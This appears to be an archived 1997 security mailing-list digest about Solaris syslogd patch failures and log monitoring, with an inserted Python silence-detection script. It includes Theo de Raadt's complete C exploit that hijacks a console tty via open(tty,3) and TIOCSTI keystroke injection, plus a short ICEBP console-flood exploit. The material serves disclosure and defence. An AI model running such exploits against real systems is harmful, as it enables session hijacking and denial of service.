solaris 251 & syslogd

From: Dave Kinchlea <[email protected]>
Subject:      Re: solaris 251 & syslogd

A small point but, with use of the `mark' facility in syslog, and proper
monitoring for it, you can and should be able to detect syslogd either
dying or refusing to write to files (amounts to the same thing). No news
is NOT good news, but knowing that we can key on it.

This is not intended to say that what you found is not a bug, just that
there is a way to detect it.

cheers, kinch

On Wed, 12 Nov 1997, Michael Helm wrote:

> I'm not having very good luck with the patch mentioned here
> (among other places) for syslogd on solaris.  Patch 103738-05
> may solve the immediate security problem, but at least for me,
> as soon as you attempt to restart it (SIGHUP), it stops writing
> messages to any of its files.  This is usually done automatically
> by scripts that close old log files & open new (empty) ones;
> they stay empty.  Unless you go looking for this, you will not
> notice it for a while (swatch or your other monitors will be
> happy &c).  No news is not good news in this case ; I see this
> as a pretty big security problem in its own right.
>

From: Richard Peters <[email protected]>
Date: Wed, 12 Nov 1997 09:49:01 -0800
Subject: Re: solaris 251 & syslogd

I experienced the same problem with this 103738-05 patch and reverted to
103738-03, with which I have not experienced the HUP problem.  However,
on the track of missing messages being a security problem, Solaris log
processing does occasionally drop messages into the trash bin, especially
when lots of messages are being processed. Not a good "feature".  ..Richard
Peters

At 8:42 AM -0800 11/12/97, Michael Helm wrote:
>I'm not having very good luck with the patch mentioned here
>(among other places) for syslogd on solaris.  Patch 103738-05
>may solve the immediate security problem, but at least for me,
>as soon as you attempt to restart it (SIGHUP), it stops writing
>messages to any of its files.  This is usually done automatically
>by scripts that close old log files & open new (empty) ones;
>they stay empty.  Unless you go looking for this, you will not
>notice it for a while (swatch or your other monitors will be
>happy &c).  No news is not good news in this case ; I see this
>as a pretty big security problem in its own right.

From: Theo de Raadt <[email protected]>
Date: Fri, 24 Oct 1997 17:47:16 -0600
Subject: BoS: Re: Possible SERIOUS bug in open()?


> This is a variant of a bug Theo de Raadt found in SunOS back in the 1980s.
> The basic issue is that the code that guards access to the device-specific
> open() routine checks explicitly for FREAD, FWRITE, and O_TRUNC, and
> passes the call through if none of these are set. Theo's bug involved
> using "3" for the open() flag.

The bug worked in SunOS 4.0 and 4.1, and if I remember correctly it
was fixed in 4.1.3.  What you basically did was this:

- lose your tty association
- open the console device you want to attack (ie. say, root is
  logged into the console)
- fd = open("/dev/console", 3); close(fd);
- now you have just gained tty association.
- fd = open("/dev/tty", O_RDWR).  This is the same as having opened
  /dev/console, but this time I have permission to read & write.
- ioctl(fd, TIOCSTI, &c) ...

Of course, TIOCSTI simulates console input.

That this basic bug is still around is pretty disappointing.  I
reported the bug to Sun, but I guess they never told anyone else about
it, and hence it did not get fixed in the standard BSD code.

I'm a little disappointed in myself for not having looked to see if
this bug still existed.  Of course, the routed problems still exist
too, and that bug is about as old. I fixed it in OpenBSD yesterday.

Any vn_open() with FREAD|FWRITE == 0 fails with EINVAL.

Here's the program I wrote a VERY VERY long time ago.  (Neato, it has
some little buffer overflows in it ;-)

----------------------------------------

#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/signal.h>
#include <sys/file.h>
#include <stdio.h>

#define ECHAR ((unsigned char)0x1d)

unsigned char tty[80];
int fd, p[2];
int v = 1, sc = 1;

/* ----------------------------------------------------------------------
 * MAIN:
 * ------------------------------------------------------------------- */
main(argc, argv)
int argc;
char **argv;
{
    int i, j, x;
    unsigned char c;

    if( argc<2 ) {
        fprintf(stderr, "Usage: %s [-v] tty\n", argv[0]);
        exit(0);
    }

    if( !strcmp(argv[1], "-v") ) {
        sprintf(tty, "/dev/%s", argv[2]);
        v = 1;
    } else sprintf(tty, "/dev/%s", argv[1]);

    printf("The escape character is ^]\n");
    status(0);

    pipe(p);
    if( fork() == 0) {
        close(p[1]);

        x = getpgrp(0);
        signal(SIGTTIN, SIG_IGN);
        signal(SIGTTOU, SIG_IGN);

        ioctl(open("/dev/tty",0), TIOCNOTTY, 0);
        if( open(tty, 3) <0)
            open(tty, O_WRONLY);
        fd = open("/dev/tty", 2);
        setpgrp(0,x);

        while(1) {
            x = read(p[0], &c, 1);
            if(x==1) ioctl(fd, TIOCSTI, &c);
            if(x==0) exit(0);
        }

    } else {
        close(p[0]);                                            /* me */
        echo(0);

        while( read(0, &c, 1) == 1) {
            c &= 0x7f;          /* kill parity bit */
            if(c==ECHAR) {
                if( read(0, &c, 1) == 1) switch( c&0x7f ) {
                    case 'q':
                    case 'Q':   die();
                                break;
                    case 'c':
                    case 'C':   sc = !sc;
                                status(1);
                                break;
                    case 'v':
                    case 'V':   v = !v;
                                status(1);
                                break;
                    case 's':
                    case 'S':   status(1);
                                break;
                    case '?':
                    case 'h':
                    case 'H':   status(1);
                                printf("\n\r? - this screen\n\r");
                                printf("q - quit\n\r");
                                printf("v - verbose\n\r");
                                printf("c - control characters\n\r");
                                printf("s - status\n\r");
                                break;
                    default:    send(ECHAR);
                                send(c);
                                break;
                    }
                else die();
            } else send(c);
        }
        die();
    }
}

/* ----------------------------------------------------------------------
 * SEND:
 * ------------------------------------------------------------------- */
send(c)
unsigned char c;
{
    unsigned char c2;

    c &= 0x7f;
    write(p[1], &c, 1);
    if(v) {
        if( c==' ' || c=='\t' ) {               /* tab and space */
            write(1, &c, 1);
        } else if( c=='\r' || c=='\n' ) {       /* return */
            write(1, "\r\n", 2);
        } else if( c<' ' ) {                    /* control characters */
            if(sc) {
                write(1, "^", 1);
                c2 = c & 0x7f | 0x40;
                write(1, &c2, 1);
            }
        } else {                                /* normal characters */
            write(1, &c, 1);
        }
    }
}

/* ----------------------------------------------------------------------
 * ECHO:
 * ------------------------------------------------------------------- */
echo(n)
int n;
{
    struct sgttyb ttyb;

    ioctl(0, TIOCGETP, &ttyb);
    if(n) ttyb.sg_flags = (ttyb.sg_flags | ECHO) & ~RAW;
    else ttyb.sg_flags = (ttyb.sg_flags & ~ECHO) | RAW;
    ioctl(1, TIOCSETP, &ttyb);
}

/* ----------------------------------------------------------------------
 * DIE:
 * ------------------------------------------------------------------- */
die()
{
    echo(1);
    exit(0);
}

status(x)
int x;
{
    if(x) printf("\n\r");
    printf("verbose:%d control:%d\n\r", v, sc);
}


From: Dave Kinchlea <[email protected]>
Date: Sat, 15 Nov 1997 11:12:21 -0800
Subject: Re: solaris 251 & syslogd

On Sat, 15 Nov 1997, M Shariful Anam wrote:

> On Wed, 12 Nov 1997, Dave Kinchlea wrote:
> | A small point but, with use of the `mark' facility in syslog, and proper
> | monitoring for it, you can and should be able to detect syslogd either
> | dying or refusing to write to files (amounts to the same thing). No ne
>
> hmm.. would you like to illustrate a bit more on it? man page on
> syslog.conf doesn't say much.

Sure
        With most (all?) syslogd implementations, there is an internal
facility called `mark'. While I am sure that the actual details of the
mark facility vary from one implementation to another, generally it is
used by syslogd to send a time stamp to the specified file and/or server
at specified time intervals (usually modifiable via command line args) as
long as no other syslog output has been generated since the last MARK.

        Assuming you have some real-time monitoring of syslog output, all
you need to do is adjust the monitoring so that you expect to see *some*
output within a specified time, if regular syslog traffic doesn't generate
any (ie: during a slow time), the `mark' facility will. When you do not
receive any output within the specified time, syslogd is down (or perhaps
the loghost and/or network is, in any case time to look into it).

        The `trick' here is to remember that many (all?) syslogd
implementations do NOT include the `mark' facility in wildcards. So,

        *.debug                 @sysloghost

in /etc/syslog.conf does NOT forward any mark records. You must include it
specifically:

        *.debug;mark.*          @sysloghost


>
> Also, logging to the console could be one solution.

Doesn't scale well and it requires humans to do the monitoring. No, this
really isn't a good answer for those who truly need the logging, there is
just no way to automate it. Besides, many of us use a single screen as
console for many different servers.

cheers, kinch

From: Solar Designer <[email protected]>
Date: Sun, 16 Nov 1997 03:25:20 -0300
Subject: Solaris x86 & ICEBP

Hello,

This Pentium bug workaround discussion reminded me of a minor Solaris x86
bug I found half a year ago (tested on Solaris 2.5).

When a program executes the originally undocumented ICEBP instruction, the
kernel reports an 'Unexpected INT 1', and the program continues running.
With default syslogd configuration, this allows flooding the console, and
no information about which process is doing this is reported.

Here's the exploit (put in a .s file):

.globl main
main:
.byte 0xf1
jmp main

Signed,
Solar Designer

From: Michael Helm <[email protected]>
Date: Sat, 15 Nov 1997 14:14:42 -0800
Subject: Re: solaris 251 & syslogd

Dave Kinchlea writes:
>         Assuming you have some real-time monitoring of syslog output, all
> you need to do is adjust the monitoring so that you expect to see *some*

This is good advice.  But....

I guess this is more of a "RISK" albeit a small one rather than a
security issue or BUGTRAQ-worthy bug, but most syslog monitors,
most monitors of every kind, look for events --
not non-events.  I'm not sure how I could get swatch to look
for the absence of mark messages.  I'm sure we could all think
of other circumstances when we'd like to know when something
wasn't happening, but the facility to do so wasn't there
(the mail hub stops accepting mail, the terminal server
stops accepting connections &c).  Something to think about
when designing a system.
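
The silence check that Dave Kinchlea describes and that Michael Helm asks how to automate, as an added example that is not part of the original thread or of any syslogd or swatch distribution: it reports stretches with no records at all and lists syslog.conf actions that never name `mark`. The 20-minute mark interval, the 5-minute slack, the file names and the sample lines are assumptions constructed for illustration.

```python
"""Alert on silence: find stretches where a syslog file received nothing."""
from datetime import datetime, timedelta

MARK_INTERVAL = timedelta(minutes=20)  # assumption: syslogd mark interval
SLACK = timedelta(minutes=5)           # assumption: tolerated delivery jitter


def parse_ts(line, year):
    """Parse the 'Mon DD HH:MM:SS' syslog prefix (no year); None if malformed."""
    try:
        return datetime.strptime(f"{year} {line[:15]}", "%Y %b %d %H:%M:%S")
    except ValueError:
        return None


def find_silences(lines, now, year, limit=MARK_INTERVAL + SLACK):
    """Return (last_seen, next_seen) pairs separated by more than `limit`.

    The last pair may end at `now`: that is the live alarm for a syslogd that
    died or stopped writing. An empty file yields (None, now), which covers a
    freshly rotated log that never receives a record.
    """
    gaps, prev = [], None
    for line in lines:
        ts = parse_ts(line, year)
        if ts is None:
            continue
        if prev is not None and ts < prev - timedelta(days=1):
            year += 1                      # Dec -> Jan rollover inside the file
            ts = ts.replace(year=year)
        if prev is not None and ts - prev > limit:
            gaps.append((prev, ts))
        prev = ts
    if prev is None or now - prev > limit:
        gaps.append((prev, now))
    return gaps


def actions_without_mark(conf_text):
    """List syslog.conf actions whose selectors never name the mark facility.

    A '*' facility is deliberately not counted as covering mark, following
    the behaviour described in the thread.
    """
    missing = []
    for raw in conf_text.splitlines():
        parts = raw.strip().split(None, 1)
        if len(parts) != 2 or parts[0].startswith("#"):
            continue
        selectors, action = parts
        facilities = set()
        for sel in selectors.split(";"):
            facilities.update(sel.rsplit(".", 1)[0].split(","))
        if "mark" not in facilities:
            missing.append(action)
    return missing


# Constructed sample data (not taken from a real host).
SAMPLE_LOG = """\
Nov 15 10:00:01 loghost sendmail[211]: constructed sample line
Nov 15 10:20:01 loghost -- MARK --
Nov 15 10:40:01 loghost -- MARK --
Nov 15 11:45:10 loghost su: constructed sample line
""".splitlines()

SAMPLE_CONF = "*.err;kern.debug\t/var/adm/messages\n*.debug;mark.*\t@sysloghost\n"

if __name__ == "__main__":
    now = datetime(1997, 11, 15, 12, 30, 0)
    for start, end in find_silences(SAMPLE_LOG, now, 1997):
        print(f"no syslog output between {start} and {end}")
    for action in actions_without_mark(SAMPLE_CONF):
        print(f"mark records never reach {action}")
```

Run on a schedule against the file the loghost writes, with `now` set to the current time, the final gap is the one that fires when log files stay empty after a SIGHUP.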

From: AnthonyX Eufemio <[email protected]>
Date: Fri, 21 Nov 1997 13:17:00 PST
Subject: Intel Pentium Bug on System V

In order for the exploit to work on most SystemV systems running on P5
x86 you have to do a sync system call first then execute the lock code.
I have tested it on SCO UnixWare 1.x, 2.x, and SCO OpenServer 5.x and it
will NOT work if you don't do a sync syscall first.

Patches are available in kernel loadable module format from the vendor.

Regards,
A E

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Anthony Eufemio
UNIX Systems Engineer
Intel Corporation
Santa Clara, CA 95052
[email protected]
(408) 765-5452
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру